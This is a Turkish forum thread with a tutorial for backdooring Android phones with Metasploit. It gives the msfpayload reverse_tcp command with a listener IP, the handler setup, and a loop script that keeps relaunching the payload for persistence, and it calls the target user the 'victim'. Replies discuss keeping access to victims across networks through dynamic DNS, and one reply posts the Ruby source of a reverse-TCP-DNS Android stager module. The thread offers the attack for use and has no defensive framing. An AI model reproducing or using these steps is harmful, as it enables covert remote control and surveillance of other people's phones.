1. Duyuruyu Kapat

Kali Linux’ta Android için Backdoor oluşturun

'Dökümanlar' forumunda ayurmada tarafından 5 Şubat 2016 tarihinde açılan konu

  1. ayurmada

    ayurmada New Member

    Katılım:
    23 Ağustos 2015
    Mesaj:
    13
    Beğeniler:
    0
    Ödül Puanları:
    0

    Adım 1: Kali’yi başlatalım.



    Uçbirim’i açalım ve yazalım:



    msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk



    [​IMG]



    • msfconsole
    • use exploit/multi/handler
    • set payload android/meterpreter/reverse_tcp
    • set LHOST 192.168.0.4
    • exploit


    [​IMG]



    Kullanıcı yada Kurban abcde.apk’yı kurduğu zaman, Meterpreter’e geçelim.



    Step 2: Kalıcı komut dosyası oluşturun
    Komut dosyası oluşturmak için not defterini açın ve bu komutları buraya kopyalayın ve anything.sh olarak kaydedin. (dosya uzantısı .sh önemlidir!)



    ——————————————————————————————————–
    #!/bin/bash
    while true
    do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
    sleep 20
    done
    ——————————————————————————————————–



    [​IMG] Bu resim yeniden boyutlandırılmıştır. Orijinal boyut için bu çubuğa tıklayınız. (901x165px)
    [​IMG]



    Home/Root Klasörüne Taşıyın yada Kopyalayın.



    Adım 3: Android sistemini ele geçirme


    Dizinlere geçmek için aşağıdaki komutları takip edelim.



    cd /



    Şimdi ROOT dizininde olmalısınız, aşağıdaki komutu yazarak kontrol edelim.



    ls



    [​IMG]



    Şimdi yazalım.



    cd etc



    Tekrar kontrol edelim.



    ls



    [​IMG]



    Tekrar dizini değiştirelim.



    cd init.d



    ls



    [​IMG]



    Buradayız. [​IMG]



    Shell Komut dosyasını yükleyelim
    update anything.sh



    [​IMG]



    Evet, hata verdi. İhtiyacımız olan Root Access komutunu tamamlamak.



    Önemli değil


    Sadece kalıcı bir uygulama yapmamız lazım, Yeniden başlatana kadar.

    Ancak, kurban android sistem üzerinde yeniden başlattığınızda gidecektir.



    Komut dosyalarını sdkarta yüklemek için:



    cd /

    cd /sdcard/Download

    ls

    upload anything.sh



    [​IMG]



    Yüklendi.



    Adım 4: Komutları yürütmek için:


    Şimdi yapmamız gereken komut dosyasını çalıştırmak ve sonra her şey otomatik olarak komut dosyası tarafından yapılacaktır.



    Yazalım.



    Shell



    Konuma gidelim.



    cd /

    cd /sdcard/Download

    ls



    Çalıştıralım.



    sh anything.sh



    [​IMG]



    Komut çalıştı. CTRL – C yaparak komutu sonlandırabilirsiniz. ( Komut dosyası hala çalışıyor. Merak etmeyin.)



    Adım 5: Test edelim


    meterpreter ile bunu test edebilirsiniz.



    [​IMG]



    Son:


    Evet, nihâyet android sistem için backdoor oluşturuldu.



    Aklımızda kalsın:


    Backdoor sadece kurban telefonu yeniden başlatana kadar kalacaktır.

    Kurbanın telefonu root ve statik ip ise,

    WAN ve LAN üzerinde kalıcı olarak duracaktır.
     
  2. gars12

    gars12 New Member

    Katılım:
    3 Ocak 2016
    Mesaj:
    20
    Beğeniler:
    0
    Ödül Puanları:
    0
    hocam uzaktan bağlantıyı nasıl sürdürebiliriz ? mesela ben kurbana backdoor yaptım fakat o başka birağda ben başka bir ağdagirdiğimde hala exploit edebilmek için ne yapmalıyım ?
     
  3. exploit

    exploit New Member

    Katılım:
    17 Eylül 2015
    Mesaj:
    104
    Beğeniler:
    0
    Ödül Puanları:
    0
    no-ip kullan
     
  4. Frown

    Frown New Member

    Katılım:
    22 Ocak 2016
    Mesaj:
    79
    Beğeniler:
    0
    Ödül Puanları:
    0
    Şehir:
    Belirtilmemiş
    ben pek anlayamadı şimdi apk cıkardın onu kurbana attın shelli yükledin bütün dosyaları alayabilirmiyiz ?
     
  5. gars12

    gars12 New Member

    Katılım:
    3 Ocak 2016
    Mesaj:
    20
    Beğeniler:
    0
    Ödül Puanları:
    0
    no ip işlemini nasıl yapıcam hocam mesela benim elimde bi android cihaz var ben buna payloadu kursam ve kullanıcıya versem o farklı bir ağda ben farklı bir ağda girdiğimde hala kurbanın android cihazında erişim nasıl sağlıya bilirim veya başka bir yolu varsa yardımcı olurmusunuz .. teşekkürler
     
  6. MSalih

    MSalih New Member

    Katılım:
    10 Ocak 2016
    Mesaj:
    80
    Beğeniler:
    0
    Ödül Puanları:
    0
    Şehir:
    Belirtilmemiş
    sanırım set LHOST = kısmına no-ip yaz dedi tam anlamadım ama :D
     
  7. Frown

    Frown New Member

    Katılım:
    22 Ocak 2016
    Mesaj:
    79
    Beğeniler:
    0
    Ödül Puanları:
    0
    Şehir:
    Belirtilmemiş
    msfpayload komutu bulunamadı hatası verdi ... nasıl düzeltebilriim ?
     
  8. karilinux

    karilinux Member

    Katılım:
    20 Ocak 2016
    Mesaj:
    145
    Beğeniler:
    0
    Ödül Puanları:
    16
    Cinsiyet:
    Erkek
    nasıl darkcomet gibi yapıcaz mesela modemi açıp kapatsak bile no ip den aldığımız ip yi sabitlesek öyle bi seçenek yokmu?
     
  9. MacTavish

    MacTavish Moderator

    Katılım:
    14 Temmuz 2015
    Mesaj:
    901
    Beğeniler:
    20
    Ödül Puanları:
    18
    Cinsiyet:
    Erkek
    Meslek:
    Öğrenci
    Şehir:
    Van
    Web Sitesi:
    MSfpayload Kali 2'De Kaldırıldı Onun Yerine Msfvenom Geldi
     
  10. exploit

    exploit New Member

    Katılım:
    17 Eylül 2015
    Mesaj:
    104
    Beğeniler:
    0
    Ödül Puanları:
    0
    dns payload yapmak için payload özelliğinide küçük bir değişiklik yapmanız gerekir reverse_tcp_dns yi kullanın
    kodları paylaşıyorum bu kodları .rb şeklinde kaydedin metasploit dosyasının içine yerleştirin
    Kod:
    ##
    # This module requires Metasploit: http//metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    require 'msf/core'
    require 'msf/core/handler/reverse_tcp'
    require 'msf/base/sessions/command_shell'
    require 'msf/base/sessions/command_shell_options'
    
    module Metasploit3
    
      include Msf::Payload::Stager
      include Msf::Payload::Dalvik
    
      def initialize(info = {})
        super(merge_info(info,
          'Name'            => 'Dalvik Reverse TCP DNS Stager',
          'Description'    => 'Connect back stager',
          'Author'        => 'timwr (DNS port by Edszx)',
          'License'        => MSF_LICENSE,
          'Platform'        => 'android',
          'Arch'            => ARCH_DALVIK,
          'Handler'        => Msf::Handler::ReverseTcp,
          'Stager'        => {'Payload' => ""}
        ))
      end
    
      def string_sub(data, placeholder, input)
        data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
      end
    
      def generate_jar(opts={})
        jar = Rex::Zip::Jar.new
    
        classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
    
        string_sub(classes, '127.0.0.1                       ', datastore['LHOST'].to_str) if datastore['LHOST']
        string_sub(classes, '4444                            ', datastore['LPORT'].to_s) if datastore['LPORT']
        jar.add_file("classes.dex", fix_dex_header(classes))
    
        files = [
          [ "AndroidManifest.xml" ],
          [ "res", "drawable-mdpi", "icon.png" ],
          [ "res", "layout", "main.xml" ],
          [ "resources.arsc" ]
        ]
    
        jar.add_files(files, File.join(Msf::Config.data_directory, "android", "apk"))
        jar.build_manifest
    
        x509_name = OpenSSL::X509::Name.parse(
          "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
          )
        key  = OpenSSL::PKey::RSA.new(1024)
        cert = OpenSSL::X509::Certificate.new
        cert.version = 2
        cert.serial = 1
        cert.subject = x509_name
        cert.issuer = x509_name
        cert.public_key = key.public_key
    
        # Some time within the last 3 years
        cert.not_before = Time.now - rand(3600*24*365*3)
    
        # From http://developer.android.com/tools/publishing/app-signing.html
        # """
        # A validity period of more than 25 years is recommended.
        #
        # If you plan to publish your application(s) on Google Play, note
        # that a validity period ending after 22 October 2033 is a
        # requirement. You can not upload an application if it is signed
        # with a key whose validity expires before that date.
        # """
        # The timestamp 0x78045d81 equates to 2033-10-22 00:00:01 UTC
        cert.not_after = Time.at( 0x78045d81  + rand( 0x7fffffff - 0x78045d81 ))
    
        jar.sign(key, cert, [cert])
    
        jar
      end
    
    end
     
  11. Frown

    Frown New Member

    Katılım:
    22 Ocak 2016
    Mesaj:
    79
    Beğeniler:
    0
    Ödül Puanları:
    0
    Şehir:
    Belirtilmemiş
    Msfvenom yazıyorum gene aynı hatayı veriyor nasıl düzeltebilriim ?
     
  12. refx2

    refx2 New Member

    Katılım:
    7 Eylül 2016
    Mesaj:
    4
    Beğeniler:
    0
    Ödül Puanları:
    0
    Hocam resımler bozulmuş yenileyebilir misiiniz?
     
  13. Enigmatic_Turk

    Enigmatic_Turk New Member

    Katılım:
    15 Nisan 2016
    Mesaj:
    23
    Beğeniler:
    0
    Ödül Puanları:
    0
    Cvp: Kali Linux’ta Android için Backdoor oluşturun

    resimler yok
     

Bu Sayfayı Paylaş

Share